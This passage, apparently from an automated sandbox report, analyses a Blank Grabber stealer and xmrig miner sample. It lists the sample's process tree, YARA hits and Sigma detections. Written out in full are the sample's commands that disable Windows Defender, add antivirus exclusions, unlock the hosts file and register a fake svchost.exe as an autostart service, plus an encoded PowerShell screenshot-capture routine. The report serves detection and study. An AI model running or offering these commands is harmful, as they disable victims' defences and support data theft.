0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 3004 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cmd.exe (PID: 1076 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7004 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7624 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 332 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7984 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 3612 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

Conhost.exe (PID: 1068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 6024 cmdline: C:\ProgramData\Microsoft\svchost.exe MD5: C289921058A4B38BDBD1373A0CBB757D)

powershell.exe (PID: 8008 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI54322\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.1724535496.000002B9B96E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000004.00000003.1710226799.0000021148F04000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000004.00000003.1710226799.0000021148F02000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2084370942.000002B9B713F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000005.00000002.2086197806.000002B9B98BD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000005.00000002.2086727493.000002B9B99E1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000005.00000003.2081920578.000002B9BA2AD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Click to see the 4 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3288, ProcessName: powercfg.exe

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\instals.exe, ProcessId: 3716, TargetFilename: C:\ProgramData\Microsoft\svchost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1136, ProcessName: powershell.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 1420, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 1068, ProcessName: cmd.exe

Sigma detected: Suspect Svchost Activity

Source: Process started

Author: David Burkett, @signalblur: Data: Command: C:\ProgramData\Microsoft\svchost.exe, CommandLine: C:\ProgramData\Microsoft\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\Microsoft\svchost.exe, NewProcessName: C:\ProgramData\Microsoft\svchost.exe, OriginalFileName: C:\ProgramData\Microsoft\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\ProgramData\Microsoft\svchost.exe, ProcessId: 6024, ProcessName: svchost.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", ProcessId: 6164, ProcessName: sc.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe', ProcessId: 3068, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\ProgramData\Microsoft\svchost.exe, CommandLine: C:\ProgramData\Microsoft\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\Microsoft\svchost.exe, NewProcessName: C:\ProgramData\Microsoft\svchost.exe, OriginalFileName: C:\ProgramData\Microsoft\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\ProgramData\Microsoft\svchost.exe, ProcessId: 6024, ProcessName: svchost.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlA